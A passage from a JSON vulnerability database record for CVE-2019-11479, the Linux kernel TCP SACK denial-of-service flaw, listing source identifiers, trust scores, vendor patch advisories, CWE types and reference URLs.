        "db": "PACKETSTORM",
        "id": "153315"
      },
      {
        "db": "PACKETSTORM",
        "id": "153321"
      },
      {
        "db": "PACKETSTORM",
        "id": "153430"
      },
      {
        "db": "PACKETSTORM",
        "id": "153478"
      },
      {
        "db": "PACKETSTORM",
        "id": "153329"
      },
      {
        "db": "PACKETSTORM",
        "id": "153320"
      }
    ],
    "trust": 2.79
  },
  "external_ids": {
    "@context": {
      "@vocab": "https://www.variotdbs.pl/ref/external_ids#",
      "data": {
        "@container": "@list"
      },
      "sources": {
        "@container": "@list",
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/sources#"
        }
      }
    },
    "data": [
      {
        "db": "NVD",
        "id": "CVE-2019-11479",
        "trust": 3.7
      },
      {
        "db": "CERT/CC",
        "id": "VU#905115",
        "trust": 2.5
      },
      {
        "db": "PULSESECURE",
        "id": "SA44193",
        "trust": 1.7
      },
      {
        "db": "ICS CERT",
        "id": "ICSMA-20-170-06",
        "trust": 1.7
      },
      {
        "db": "ICS CERT",
        "id": "ICSA-19-253-03",
        "trust": 1.7
      },
      {
        "db": "SIEMENS",
        "id": "SSA-462066",
        "trust": 1.7
      },
      {
        "db": "OPENWALL",
        "id": "OSS-SECURITY/2019/06/28/2",
        "trust": 1.7
      },
      {
        "db": "OPENWALL",
        "id": "OSS-SECURITY/2019/07/06/4",
        "trust": 1.7
      },
      {
        "db": "OPENWALL",
        "id": "OSS-SECURITY/2019/07/06/3",
        "trust": 1.7
      },
      {
        "db": "BID",
        "id": "108818",
        "trust": 1.7
      },
      {
        "db": "MCAFEE",
        "id": "SB10287",
        "trust": 1.7
      },
      {
        "db": "CNNVD",
        "id": "CNNVD-201906-683",
        "trust": 0.7
      },
      {
        "db": "PACKETSTORM",
        "id": "153329",
        "trust": 0.7
      },
      {
        "db": "AUSCERT",
        "id": "ESB-2019.2378",
        "trust": 0.6
      },
      {
        "db": "AUSCERT",
        "id": "ESB-2020.3564",
        "trust": 0.6
      },
      {
        "db": "AUSCERT",
        "id": "ESB-2019.4528",
        "trust": 0.6
      },
      {
        "db": "AUSCERT",
        "id": "ESB-2020.4255",
        "trust": 0.6
      },
      {
        "db": "AUSCERT",
        "id": "ESB-2019.2171",
        "trust": 0.6
      },
      {
        "db": "AUSCERT",
        "id": "ESB-2020.0736",
        "trust": 0.6
      },
      {
        "db": "AUSCERT",
        "id": "ESB-2019.2155",
        "trust": 0.6
      },
      {
        "db": "AUSCERT",
        "id": "ESB-2019.2185.6",
        "trust": 0.6
      },
      {
        "db": "AUSCERT",
        "id": "ESB-2020.2145",
        "trust": 0.6
      },
      {
        "db": "AUSCERT",
        "id": "ASB-2019.0178.3",
        "trust": 0.6
      },
      {
        "db": "AUSCERT",
        "id": "ESB-2019.4316",
        "trust": 0.6
      },
      {
        "db": "AUSCERT",
        "id": "ESB-2019.2185.5",
        "trust": 0.6
      },
      {
        "db": "LENOVO",
        "id": "LEN-60182",
        "trust": 0.6
      },
      {
        "db": "LENOVO",
        "id": "LEN-29592",
        "trust": 0.6
      },
      {
        "db": "PACKETSTORM",
        "id": "153478",
        "trust": 0.2
      },
      {
        "db": "PACKETSTORM",
        "id": "153477",
        "trust": 0.2
      },
      {
        "db": "VULHUB",
        "id": "VHN-143129",
        "trust": 0.1
      },
      {
        "db": "VULMON",
        "id": "CVE-2019-11479",
        "trust": 0.1
      },
      {
        "db": "PACKETSTORM",
        "id": "153323",
        "trust": 0.1
      },
      {
        "db": "PACKETSTORM",
        "id": "153326",
        "trust": 0.1
      },
      {
        "db": "PACKETSTORM",
        "id": "153324",
        "trust": 0.1
      },
      {
        "db": "PACKETSTORM",
        "id": "153337",
        "trust": 0.1
      },
      {
        "db": "PACKETSTORM",
        "id": "153315",
        "trust": 0.1
      },
      {
        "db": "PACKETSTORM",
        "id": "153321",
        "trust": 0.1
      },
      {
        "db": "PACKETSTORM",
        "id": "153430",
        "trust": 0.1
      },
      {
        "db": "PACKETSTORM",
        "id": "153320",
        "trust": 0.1
      }
    ],
    "sources": [
      {
        "db": "CERT/CC",
        "id": "VU#905115"
      },
      {
        "db": "VULHUB",
        "id": "VHN-143129"
      },
      {
        "db": "VULMON",
        "id": "CVE-2019-11479"
      },
      {
        "db": "PACKETSTORM",
        "id": "153323"
      },
      {
        "db": "PACKETSTORM",
        "id": "153477"
      },
      {
        "db": "PACKETSTORM",
        "id": "153326"
      },
      {
        "db": "PACKETSTORM",
        "id": "153324"
      },
      {
        "db": "PACKETSTORM",
        "id": "153337"
      },
      {
        "db": "PACKETSTORM",
        "id": "153315"
      },
      {
        "db": "PACKETSTORM",
        "id": "153321"
      },
      {
        "db": "PACKETSTORM",
        "id": "153430"
      },
      {
        "db": "PACKETSTORM",
        "id": "153478"
      },
      {
        "db": "PACKETSTORM",
        "id": "153329"
      },
      {
        "db": "PACKETSTORM",
        "id": "153320"
      },
      {
        "db": "CNNVD",
        "id": "CNNVD-201906-683"
      },
      {
        "db": "NVD",
        "id": "CVE-2019-11479"
      }
    ]
  },
  "id": "VAR-201906-1174",
  "iot": {
    "@context": {
      "@vocab": "https://www.variotdbs.pl/ref/iot#",
      "sources": {
        "@container": "@list",
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/sources#"
        }
      }
    },
    "data": true,
    "sources": [
      {
        "db": "VULHUB",
        "id": "VHN-143129"
      }
    ],
    "trust": 0.01
  },
  "last_update_date": "2024-07-23T21:03:12.658000Z",
  "patch": {
    "@context": {
      "@vocab": "https://www.variotdbs.pl/ref/patch#",
      "data": {
        "@container": "@list"
      },
      "sources": {
        "@container": "@list",
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/sources#"
        }
      }
    },
    "data": [
      {
        "title": "Linux kernel Remediation of resource management error vulnerabilities",
        "trust": 0.6,
        "url": "http://www.cnnvd.org.cn/web/xxk/bdxqbyid.tag?id=93877"
      },
      {
        "title": "Red Hat: Important: redhat-virtualization-host security update",
        "trust": 0.1,
        "url": "https://vulmon.com/vendoradvisory?qidtp=red_hat_security_advisories\u0026qid=rhsa-20191594 - security advisory"
      },
      {
        "title": "Ubuntu Security Notice: linux, linux-aws, linux-aws-hwe, linux-azure, linux-gcp, linux-gke-4.15, linux-hwe, linux-kvm, linux-oem, linux-oracle, linux-raspi2, linux-snapdragon update",
        "trust": 0.1,
        "url": "https://vulmon.com/vendoradvisory?qidtp=ubuntu_security_notice\u0026qid=usn-4041-1"
      },
      {
        "title": "Ubuntu Security Notice: linux-lts-xenial, linux-aws, linux-azure update",
        "trust": 0.1,
        "url": "https://vulmon.com/vendoradvisory?qidtp=ubuntu_security_notice\u0026qid=usn-4041-2"
      },
      {
        "title": "Red Hat: Important: kernel security and bug fix update",
        "trust": 0.1,
        "url": "https://vulmon.com/vendoradvisory?qidtp=red_hat_security_advisories\u0026qid=rhsa-20191485 - security advisory"
      },
      {
        "title": "Red Hat: Important: kernel security and bug fix update",
        "trust": 0.1,
        "url": "https://vulmon.com/vendoradvisory?qidtp=red_hat_security_advisories\u0026qid=rhsa-20191484 - security advisory"
      },
      {
        "title": "Red Hat: Important: kernel-rt security and bug fix update",
        "trust": 0.1,
        "url": "https://vulmon.com/vendoradvisory?qidtp=red_hat_security_advisories\u0026qid=rhsa-20191480 - security advisory"
      },
      {
        "title": "Red Hat: Important: kernel-rt security and bug fix update",
        "trust": 0.1,
        "url": "https://vulmon.com/vendoradvisory?qidtp=red_hat_security_advisories\u0026qid=rhsa-20191487 - security advisory"
      },
      {
        "title": "Red Hat: Important: kernel security update",
        "trust": 0.1,
        "url": "https://vulmon.com/vendoradvisory?qidtp=red_hat_security_advisories\u0026qid=rhsa-20191482 - security advisory"
      },
      {
        "title": "Red Hat: Important: kernel-rt security update",
        "trust": 0.1,
        "url": "https://vulmon.com/vendoradvisory?qidtp=red_hat_security_advisories\u0026qid=rhsa-20191486 - security advisory"
      },
      {
        "title": "Red Hat: Important: kernel security update",
        "trust": 0.1,
        "url": "https://vulmon.com/vendoradvisory?qidtp=red_hat_security_advisories\u0026qid=rhsa-20191481 - security advisory"
      },
      {
        "title": "Red Hat: CVE-2019-11479",
        "trust": 0.1,
        "url": "https://vulmon.com/vendoradvisory?qidtp=red_hat_cve_database\u0026qid=cve-2019-11479"
      },
      {
        "title": "Red Hat: Important: kernel security and bug fix update",
        "trust": 0.1,
        "url": "https://vulmon.com/vendoradvisory?qidtp=red_hat_security_advisories\u0026qid=rhsa-20191488 - security advisory"
      },
      {
        "title": "Red Hat: Important: kernel security and bug fix update",
        "trust": 0.1,
        "url": "https://vulmon.com/vendoradvisory?qidtp=red_hat_security_advisories\u0026qid=rhsa-20191490 - security advisory"
      },
      {
        "title": "Red Hat: Important: kernel security and bug fix update",
        "trust": 0.1,
        "url": "https://vulmon.com/vendoradvisory?qidtp=red_hat_security_advisories\u0026qid=rhsa-20191489 - security advisory"
      },
      {
        "title": "Red Hat: Important: kernel security and bug fix update",
        "trust": 0.1,
        "url": "https://vulmon.com/vendoradvisory?qidtp=red_hat_security_advisories\u0026qid=rhsa-20191479 - security advisory"
      },
      {
        "title": "Red Hat: Important: redhat-virtualization-host security and enhancement update",
        "trust": 0.1,
        "url": "https://vulmon.com/vendoradvisory?qidtp=red_hat_security_advisories\u0026qid=rhsa-20191699 - security advisory"
      },
      {
        "title": "Red Hat: Important: kernel security, bug fix, and enhancement update",
        "trust": 0.1,
        "url": "https://vulmon.com/vendoradvisory?qidtp=red_hat_security_advisories\u0026qid=rhsa-20191483 - security advisory"
      },
      {
        "title": "Arch Linux Issues: ",
        "trust": 0.1,
        "url": "https://vulmon.com/vendoradvisory?qidtp=arch_linux_issues\u0026qid=cve-2019-11479"
      },
      {
        "title": "IBM: Security Bulletin: IBM API Connect V5 is vulnerable to denial of service (CVE-2019-11479)",
        "trust": 0.1,
        "url": "https://vulmon.com/vendoradvisory?qidtp=ibm_psirt_blog\u0026qid=466b16aef90489b4cfbad864a3c73732"
      },
      {
        "title": "Amazon Linux AMI: ALAS-2019-1222",
        "trust": 0.1,
        "url": "https://vulmon.com/vendoradvisory?qidtp=amazon_linux_ami\u0026qid=alas-2019-1222"
      },
      {
        "title": "Arch Linux Advisories: [ASA-201906-12] linux-hardened: denial of service",
        "trust": 0.1,
        "url": "https://vulmon.com/vendoradvisory?qidtp=arch_linux_advisories\u0026qid=asa-201906-12"
      },
      {
        "title": "Amazon Linux 2: ALAS2-2019-1222",
        "trust": 0.1,
        "url": "https://vulmon.com/vendoradvisory?qidtp=amazon_linux2\u0026qid=alas2-2019-1222"
      },
      {
        "title": "Arch Linux Advisories: [ASA-201906-15] linux-zen: denial of service",
        "trust": 0.1,
        "url": "https://vulmon.com/vendoradvisory?qidtp=arch_linux_advisories\u0026qid=asa-201906-15"
      },
      {
        "title": "Arch Linux Advisories: [ASA-201906-14] linux-lts: denial of service",
        "trust": 0.1,
        "url": "https://vulmon.com/vendoradvisory?qidtp=arch_linux_advisories\u0026qid=asa-201906-14"
      },
      {
        "title": "Arch Linux Advisories: [ASA-201906-13] linux: denial of service",
        "trust": 0.1,
        "url": "https://vulmon.com/vendoradvisory?qidtp=arch_linux_advisories\u0026qid=asa-201906-13"
      },
      {
        "title": "IBM: Security Bulletin: Multiple Vulnerabilities in the Linux kernel affect the IBM FlashSystem models 840 and 900",
        "trust": 0.1,
        "url": "https://vulmon.com/vendoradvisory?qidtp=ibm_psirt_blog\u0026qid=b0e404260719b6ae04a48fa01fe4ff1d"
      },
      {
        "title": "IBM: Security Bulletin: Multiple Vulnerabilities in the Linux kernel affect the IBM FlashSystem models V840 and V9000",
        "trust": 0.1,
        "url": "https://vulmon.com/vendoradvisory?qidtp=ibm_psirt_blog\u0026qid=17e4e6718a6d3a42ddb3642e1aa88aaf"
      },
      {
        "title": "IBM: IBM Security Bulletin: IBM Cloud Kubernetes Service is affected by Linux Kernel security vulnerabilities (CVE-2019-11477, CVE-2019-11478, CVE-2019-11479)",
        "trust": 0.1,
        "url": "https://vulmon.com/vendoradvisory?qidtp=ibm_psirt_blog\u0026qid=c19eb1501fe75f4801786c3ecf1bdfcd"
      },
      {
        "title": "IBM: IBM Security Bulletin: Vulnerabilities in kernel affect Power Hardware Management Console (CVE-2019-11479,CVE-2019-11477 and CVE-2019-11478)",
        "trust": 0.1,
        "url": "https://vulmon.com/vendoradvisory?qidtp=ibm_psirt_blog\u0026qid=1eb240b9222a3f8a10e0a63fa47e7f24"
      },
      {
        "title": "IBM: IBM Security Bulletin: IBM MQ Appliance is affected by kernel vulnerabilities (CVE-2019-11479, CVE-2019-11478 and CVE-2019-11477)",
        "trust": 0.1,
        "url": "https://vulmon.com/vendoradvisory?qidtp=ibm_psirt_blog\u0026qid=3abb37d34c3aab5be030484842a197cf"
      },
      {
        "title": "IBM: IBM Security Bulletin: Linux Kernel as used by IBM QRadar SIEM is vulnerable to Denial of Service(CVE-2019-11477, CVE-2019-11478, CVE-2019-11479)",
        "trust": 0.1,
        "url": "https://vulmon.com/vendoradvisory?qidtp=ibm_psirt_blog\u0026qid=ac66c3446fcbed558afc45a4f11875b9"
      },
      {
        "title": "IBM: IBM Security Bulletin: Linux Kernel as used in IBM QRadar Network Packet Capture is vulnerable to denial of service (CVE-2019-11477, CVE-2019-11478, CVE-2019-11479)",
        "trust": 0.1,
        "url": "https://vulmon.com/vendoradvisory?qidtp=ibm_psirt_blog\u0026qid=d4c7bbb6295709432116ceed6c8665d0"
      },
      {
        "title": "IBM: IBM Security Bulletin: IBM QRadar Network Security is affected by Linux kernel vulnerabilities (CVE-2019-11479, CVE-2019-11478, CVE-2019-11477)",
        "trust": 0.1,
        "url": "https://vulmon.com/vendoradvisory?qidtp=ibm_psirt_blog\u0026qid=bae5fea992c13f587f4c457e2320189d"
      },
      {
        "title": "IBM: IBM Security Bulletin: IBM Security QRadar Packet Capture is vulnerable to Denial of Service (CVE-2019-11477, CVE-2019-11478, CVE-2019-11479, CVE-2019-3896)",
        "trust": 0.1,
        "url": "https://vulmon.com/vendoradvisory?qidtp=ibm_psirt_blog\u0026qid=1282c74cfb8f7d86371051c0a3c9e604"
      },
      {
        "title": "Siemens Security Advisories: Siemens Security Advisory",
        "trust": 0.1,
        "url": "https://vulmon.com/vendoradvisory?qidtp=siemens_security_advisories\u0026qid=b013e0ae6345849ef39c81d52c9d45cf"
      },
      {
        "title": "Citrix Security Bulletins: Citrix SD-WAN Security Update",
        "trust": 0.1,
        "url": "https://vulmon.com/vendoradvisory?qidtp=citrix_security_bulletins\u0026qid=fa8566afabfba193549f3f15c0c81ff5"
      },
      {
        "title": "Debian Security Advisories: DSA-4465-1 linux -- security update",
        "trust": 0.1,
        "url": "https://vulmon.com/vendoradvisory?qidtp=debian_security_advisories\u0026qid=1a396329c4647adcc53e47cd56d6ddad"
      },
      {
        "title": "Debian CVElist Bug Report Logs: linux-image-4.19.0-4-amd64: CVE-2019-11815",
        "trust": 0.1,
        "url": "https://vulmon.com/vendoradvisory?qidtp=debian_cvelist_bugreportlogs\u0026qid=877a1ae1b4d7402bac3b3a0c44e3253b"
      },
      {
        "title": "IBM: Security Bulletin: Vulnerabilities have been identified in OpenSSL and the Kernel shipped with the DS8000 Hardware Management Console (HMC)",
        "trust": 0.1,
        "url": "https://vulmon.com/vendoradvisory?qidtp=ibm_psirt_blog\u0026qid=423d1da688755122eb2591196e4cc160"
      },
      {
        "title": "Oracle Linux Bulletins: Oracle Linux Bulletin - July 2019",
        "trust": 0.1,
        "url": "https://vulmon.com/vendoradvisory?qidtp=oracle_linux_bulletins\u0026qid=767e8ff3a913d6c9b177c63c24420933"
      },
      {
        "title": "Fortinet Security Advisories: TCP SACK panic attack- Linux Kernel Vulnerabilities- CVE-2019-11477, CVE-2019-11478 \u0026 CVE-2019-11479",
        "trust": 0.1,
        "url": "https://vulmon.com/vendoradvisory?qidtp=fortinet_security_advisories\u0026qid=fg-ir-19-180"
      },
      {
        "title": "IBM: Security Bulletin: Multiple vulnerabilities affect IBM Cloud Object Storage Systems (February 2020v2)",
        "trust": 0.1,
        "url": "https://vulmon.com/vendoradvisory?qidtp=ibm_psirt_blog\u0026qid=d9474066c07efdb84c4612586270078f"
      },
      {
        "title": "IBM: IBM Security Bulletin: IBM Netezza Host Management is affected by the vulnerabilities known as Intel Microarchitectural Data Sampling (MDS) and other Kernel vulnerabilities",
        "trust": 0.1,
        "url": "https://vulmon.com/vendoradvisory?qidtp=ibm_psirt_blog\u0026qid=9b0697bf711f12539432f3ec83b074bf"
      },
      {
        "title": "IBM: IBM Security Bulletin: Linux Kernel vulnerabilities affect IBM Spectrum Protect Plus CVE-2019-10140, CVE-2019-11477, CVE-2019-11478, CVE-2019-11479, CVE-2019-13233, CVE-2019-13272, CVE-2019-14283, CVE-2019-14284, CVE-2019-15090, CVE-2019-15807, CVE-2019-15925",
        "trust": 0.1,
        "url": "https://vulmon.com/vendoradvisory?qidtp=ibm_psirt_blog\u0026qid=d9cd8f6d11c68af77f2f2bd27ca37bed"
      },
      {
        "title": "IBM: IBM Security Bulletin: Multiple Security Vulnerabilities have been addressed in IBM Security Access Manager Appliance",
        "trust": 0.1,
        "url": "https://vulmon.com/vendoradvisory?qidtp=ibm_psirt_blog\u0026qid=800337bc69aa7ad92ac88a2adcc7d426"
      },
      {
        "title": "Palo Alto Networks Security Advisory: ",
        "trust": 0.1,
        "url": "https://vulmon.com/vendoradvisory?qidtp=palo_alto_networks_security_advisory\u0026qid=e4153a9b76a5eea42e73bc20e968375b"
      },
      {
        "title": "Palo Alto Networks Security Advisory: PAN-SA-2019-0013 Information about TCP SACK Panic Findings in PAN-OS",
        "trust": 0.1,
        "url": "https://vulmon.com/vendoradvisory?qidtp=palo_alto_networks_security_advisory\u0026qid=57ed3d9f467472d630cb7b7dfca89570"
      },
      {
        "title": "IBM: IBM Security Bulletin: Vyatta 5600 vRouter Software Patches \u00e2\u20ac\u201c Release 1801-za",
        "trust": 0.1,
        "url": "https://vulmon.com/vendoradvisory?qidtp=ibm_psirt_blog\u0026qid=8710e4e233940f7482a6adad4643a7a8"
      },
      {
        "title": "IBM: IBM Security Bulletin: IBM Security Privileged Identity Manager is affected by multiple security vulnerabilities",
        "trust": 0.1,
        "url": "https://vulmon.com/vendoradvisory?qidtp=ibm_psirt_blog\u0026qid=8580d3cd770371e2ef0f68ca624b80b0"
      },
      {
        "title": "Siemens Security Advisories: Siemens Security Advisory",
        "trust": 0.1,
        "url": "https://vulmon.com/vendoradvisory?qidtp=siemens_security_advisories\u0026qid=ec6577109e640dac19a6ddb978afe82d"
      },
      {
        "title": "Frankfurter Freifunk-Firmware",
        "trust": 0.1,
        "url": "https://github.com/misanthropos/ffffm "
      },
      {
        "title": "docLinux",
        "trust": 0.1,
        "url": "https://github.com/ivan-778/doclinux "
      }
    ],
    "sources": [
      {
        "db": "VULMON",
        "id": "CVE-2019-11479"
      },
      {
        "db": "CNNVD",
        "id": "CNNVD-201906-683"
      }
    ]
  },
  "problemtype_data": {
    "@context": {
      "@vocab": "https://www.variotdbs.pl/ref/problemtype_data#",
      "sources": {
        "@container": "@list",
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/sources#"
        }
      }
    },
    "data": [
      {
        "problemtype": "CWE-770",
        "trust": 1.1
      },
      {
        "problemtype": "CWE-400",
        "trust": 0.1
      }
    ],
    "sources": [
      {
        "db": "VULHUB",
        "id": "VHN-143129"
      },
      {
        "db": "NVD",
        "id": "CVE-2019-11479"
      }
    ]
  },
  "references": {
    "@context": {
      "@vocab": "https://www.variotdbs.pl/ref/references#",
      "data": {
        "@container": "@list"
      },
      "sources": {
        "@container": "@list",
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/sources#"
        }
      }
    },
    "data": [
      {
        "trust": 4.0,
        "url": "https://access.redhat.com/security/vulnerabilities/tcpsack"
      },
      {
        "trust": 2.5,
        "url": "https://github.com/netflix/security-bulletins/blob/master/advisories/third-party/2019-001.md"
      },
      {
        "trust": 2.5,
        "url": "https://www.synology.com/security/advisory/synology_sa_19_28"
      },
      {
        "trust": 2.3,
        "url": "http://www.securityfocus.com/bid/108818"
      },
      {
        "trust": 2.3,
        "url": "https://www.us-cert.gov/ics/advisories/icsa-19-253-03"
      },
      {
        "trust": 2.3,
        "url": "https://www.us-cert.gov/ics/advisories/icsma-20-170-06"
      },
      {
        "trust": 2.3,
        "url": "https://usn.ubuntu.com/4041-1/"
      },
      {
        "trust": 2.3,
        "url": "https://usn.ubuntu.com/4041-2/"
      },
      {
        "trust": 1.9,
        "url": "https://wiki.ubuntu.com/securityteam/knowledgebase/sackpanic"
      },
      {
        "trust": 1.8,
        "url": "https://access.redhat.com/errata/rhsa-2019:1602"
      },
      {
        "trust": 1.7,
        "url": "https://www.kb.cert.org/vuls/id/905115"
      },
      {
        "trust": 1.7,
        "url": "http://www.arubanetworks.com/assets/alert/aruba-psa-2020-010.txt"
      },
      {
        "trust": 1.7,
        "url": "https://cert-portal.siemens.com/productcert/pdf/ssa-462066.pdf"
      },
      {
        "trust": 1.7,
        "url": "https://kb.pulsesecure.net/articles/pulse_security_advisories/sa44193"
      },
      {
        "trust": 1.7,
        "url": "https://psirt.global.sonicwall.com/vuln-detail/snwlid-2019-0008"
      },
      {
        "trust": 1.7,
        "url": "https://security.netapp.com/advisory/ntap-20190625-0001/"
      },
      {
        "trust": 1.7,
        "url": "https://support.f5.com/csp/article/k35421172"
      },
      {
        "trust": 1.7,
        "url": "https://git.kernel.org/pub/scm/linux/kernel/git/davem/net.git/commit/?id=5f3e2bf008c2221478101ee72f5cb4654b9fc363"
      },
      {
        "trust": 1.7,
        "url": "https://git.kernel.org/pub/scm/linux/kernel/git/davem/net.git/commit/?id=967c05aee439e6e5d7d805e195b3a20ef5c433d6"
      },
      {
        "trust": 1.7,
        "url": "https://www.oracle.com/security-alerts/cpujan2020.html"
      },
      {
        "trust": 1.7,
        "url": "https://www.oracle.com/security-alerts/cpuoct2020.html"
      },
      {
        "trust": 1.7,
        "url": "http://www.openwall.com/lists/oss-security/2019/06/28/2"
      },
      {
        "trust": 1.7,
        "url": "http://www.openwall.com/lists/oss-security/2019/07/06/3"
      },
      {
        "trust": 1.7,
        "url": "http://www.openwall.com/lists/oss-security/2019/07/06/4"
      },
      {
        "trust": 1.7,
        "url": "https://access.redhat.com/errata/rhsa-2019:1594"
      },
      {
        "trust": 1.7,
        "url": "https://access.redhat.com/errata/rhsa-2019:1699"
      },
      {
        "trust": 1.7,
        "url": "https://nvd.nist.gov/vuln/detail/cve-2019-11479"
      },
      {
        "trust": 1.6,
        "url": "https://kc.mcafee.com/corporate/index?page=content\u0026id=sb10287"
      },
      {
        "trust": 1.3,
        "url": "https://access.redhat.com/security/cve/cve-2019-11479"
      },
      {
        "trust": 1.0,
        "url": "https://support.f5.com/csp/article/k35421172?utm_source=f5support\u0026amp%3butm_medium=rss"
      },
      {
        "trust": 0.9,
        "url": "https://nvd.nist.gov/vuln/detail/cve-2019-11477"
      },
      {
        "trust": 0.9,
        "url": "https://nvd.nist.gov/vuln/detail/cve-2019-11478"
      },
      {
        "trust": 0.8,
        "url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=cve-2019-11477"
      },
      {
        "trust": 0.8,
        "url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=cve-2019-11478"
      },
      {
        "trust": 0.8,
        "url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=cve-2019-11479"
      },
      {
        "trust": 0.8,
        "url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=cve-2019-5599"
      },
      {
        "trust": 0.8,
        "url": "https://security.archlinux.org/cve-2019-11477https://security.archlinux.org/cve-2019-11478https://security.archlinux.org/cve-2019-11479"
      },
      {
        "trust": 0.8,
        "url": "https://www.arista.com/en/support/advisories-notices/security-advisories/8066-security-advisory-41"
      },
      {
        "trust": 0.8,
        "url": "https://coreos.com/releases/"
      },
      {
        "trust": 0.8,
        "url": "https://security-tracker.debian.org/tracker/cve-2019-11477https://security-tracker.debian.org/tracker/cve-2019-11478https://security-tracker.debian.org/tracker/cve-2019-11479"
      },
      {
        "trust": 0.8,
        "url": "https://www.suse.com/c/suse-addresses-the-sack-panic-tcp-remote-denial-of-service-attacks/https://www.suse.com/support/kb/doc/?id=7023928"
      },
      {
        "trust": 0.8,
        "url": "https://usn.ubuntu.com/4017-1/https://usn.ubuntu.com/4017-2/"
      },
      {
        "trust": 0.7,
        "url": "https://www.redhat.com/mailman/listinfo/rhsa-announce"
      },
      {
        "trust": 0.7,
        "url": "https://access.redhat.com/articles/11258"
      },
      {
        "trust": 0.7,
        "url": "https://bugzilla.redhat.com/):"
      },
      {
        "trust": 0.7,
        "url": "https://access.redhat.com/security/team/key/"
      },
      {
        "trust": 0.7,
        "url": "https://access.redhat.com/security/cve/cve-2019-11477"
      },
      {
        "trust": 0.7,
        "url": "https://access.redhat.com/security/cve/cve-2019-11478"
      },
      {
        "trust": 0.7,
        "url": "https://access.redhat.com/errata/rhsa-2019:1484"
      },
      {
        "trust": 0.7,
        "url": "https://access.redhat.com/security/team/contact/"
      },
      {
        "trust": 0.7,
        "url": "https://access.redhat.com/security/updates/classification/#important"
      },
      {
        "trust": 0.7,
        "url": "https://access.redhat.com/errata/rhsa-2019:1487"
      },
      {
        "trust": 0.7,
        "url": "https://access.redhat.com/errata/rhsa-2019:1486"
      },
      {
        "trust": 0.7,
        "url": "https://access.redhat.com/errata/rhsa-2019:1479"
      },
      {
        "trust": 0.7,
        "url": "https://access.redhat.com/errata/rhsa-2019:1485"
      },
      {
        "trust": 0.7,
        "url": "https://access.redhat.com/errata/rhsa-2019:1489"
      },
      {
        "trust": 0.6,
        "url": "https://support.f5.com/csp/article/k35421172?utm_source=f5support\u0026utm_medium=rss"
      },
      {
        "trust": 0.6,
        "url": "https://access.redhat.com/errata/rhsa-2019:1490"
      },
      {
        "trust": 0.6,
        "url": "https://access.redhat.com/errata/rhsa-2019:1488"
      },
      {
        "trust": 0.6,
        "url": "https://access.redhat.com/errata/rhsa-2019:1483"
      },
      {
        "trust": 0.6,
        "url": "https://access.redhat.com/errata/rhsa-2019:1482"
      },
      {
        "trust": 0.6,
        "url": "https://access.redhat.com/errata/rhsa-2019:1481"
      },
      {
        "trust": 0.6,
        "url": "https://access.redhat.com/errata/rhsa-2019:1480"
      },
      {
        "trust": 0.6,
        "url": "https://bugzilla.redhat.com/show_bug.cgi?id=1719129"
      },
      {
        "trust": 0.6,
        "url": "http://www.kernel.org/"
      },
      {
        "trust": 0.6,
        "url": "https://www.suse.com/support/update/announcement/2019/suse-su-20191530-1.html"
      },
      {
        "trust": 0.6,
        "url": "https://www.suse.com/support/update/announcement/2019/suse-su-20191529-1.html"
      },
      {
        "trust": 0.6,
        "url": "https://www.suse.com/support/update/announcement/2019/suse-su-20191532-1.html"
      },
      {
        "trust": 0.6,
        "url": "https://www.suse.com/support/update/announcement/2019/suse-su-20191536-1.html"
      },
      {
        "trust": 0.6,
        "url": "https://www.suse.com/support/update/announcement/2019/suse-su-20191550-1.html"
      },
      {
        "trust": 0.6,
        "url": "https://www.suse.com/support/update/announcement/2019/suse-su-20191535-1.html"
      },
      {
        "trust": 0.6,
        "url": "https://www.suse.com/support/update/announcement/2019/suse-su-20191534-1.html"
      },
      {
        "trust": 0.6,
        "url": "https://www.suse.com/support/update/announcement/2019/suse-su-20191533-1.html"
      },
      {
        "trust": 0.6,
        "url": "https://www.suse.com/support/update/announcement/2019/suse-su-20191527-1.html"
      },
      {
        "trust": 0.6,
        "url": "https://www.suse.com/support/update/announcement/2019/suse-su-201914089-1.html"
      },
      {
        "trust": 0.6,
        "url": "https://fortiguard.com/psirt/fg-ir-19-180"
      },
      {
        "trust": 0.6,
        "url": "https://www.auscert.org.au/bulletins/esb-2019.4528/"
      },
      {
        "trust": 0.6,
        "url": "https://support.lenovo.com/us/en/product_security/len-60182"
      },
      {
        "trust": 0.6,
        "url": "https://www.auscert.org.au/bulletins/esb-2019.4316/"
      },
      {
        "trust": 0.6,
        "url": "https://www.auscert.org.au/bulletins/esb-2020.0736/"
      },
      {
        "trust": 0.6,
        "url": "https://packetstormsecurity.com/files/153329/linux-freebsd-tcp-based-denial-of-service.html"
      },
      {
        "trust": 0.6,
        "url": "https://www.ibm.com/support/pages/node/1137796"
      },
      {
        "trust": 0.6,
        "url": "https://www.auscert.org.au/bulletins/esb-2019.2155/"
      },
      {
        "trust": 0.6,
        "url": "https://www.auscert.org.au/bulletins/esb-2019.2185.6/"
      },
      {
        "trust": 0.6,
        "url": "https://www.ibm.com/support/pages/node/3517185"
      },
      {
        "trust": 0.6,
        "url": "https://us-cert.cisa.gov/ics/advisories/icsa-19-253-03"
      },
      {
        "trust": 0.6,
        "url": "https://vigilance.fr/vulnerability/linux-kernel-denial-of-service-via-tcp-sack-low-mss-resource-29546"
      },
      {
        "trust": 0.6,
        "url": "https://www.ibm.com/blogs/psirt/security-bulletin-vulnerabilities-have-been-identified-in-openssl-and-the-kernel-shipped-with-the-ds8000-hardware-management-console-hmc/"
      },
      {
        "trust": 0.6,
        "url": "https://support.lenovo.com/us/en/product_security/len-29592"
      },
      {
        "trust": 0.6,
        "url": "https://www.auscert.org.au/bulletins/esb-2020.4255/"
      },
      {
        "trust": 0.6,
        "url": "https://www.auscert.org.au/bulletins/esb-2019.2378/"
      },
      {
        "trust": 0.6,
        "url": "https://www.auscert.org.au/bulletins/esb-2020.2145/"
      },
      {
        "trust": 0.6,
        "url": "https://www.auscert.org.au/bulletins/esb-2019.2171/"
      },
      {
        "trust": 0.6,
        "url": "https://www.auscert.org.au/bulletins/asb-2019.0178.3/"
      },
      {
        "trust": 0.6,
